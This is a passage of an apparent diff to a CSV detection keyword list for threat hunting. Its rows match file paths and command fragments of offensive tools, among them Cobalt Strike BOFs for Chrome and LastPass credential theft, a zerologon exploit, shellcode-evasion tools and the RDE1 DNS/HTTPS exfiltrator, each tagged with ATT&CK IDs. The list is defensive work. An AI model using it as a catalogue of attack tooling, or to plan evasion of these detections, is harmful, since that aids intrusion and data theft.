Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*src/john.asm*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*SQLServer_Accessible_PotentialSensitiveData.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*SQLServer_DefaultLogin.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*src/cracker.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/genmkvpwd.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/john.asm*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*src/ligolo*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*src/obfuscator.c*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" -"*src/Remote/chromeKey/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/lastpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_config/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_create/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_delete/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/Remote/sc_start/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*src/ShellGhost.c*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*src/Remote/chromeKey/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/lastpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_config/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_create/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_delete/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/Remote/sc_start/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*src/ShellGhost.c*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*Src/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" -"*src/tests/NESSIE/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*src/tests/NESSIE/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*src/zerologon.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*src\unhook.c*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","0","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*src\unhook.c*","offensive_tool_keyword","cobaltstrike","Remove API hooks from a Beacon process.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/unhook-bof","1","0","N/A","10","10","240","61","2021-09-18T18:12:41Z","2021-01-13T02:20:44Z" -"*srde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*srde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*srde_release dns -k *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*srde_release https -i *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde dns -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release dns -k *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*srde_release https -i *","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*srvsvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 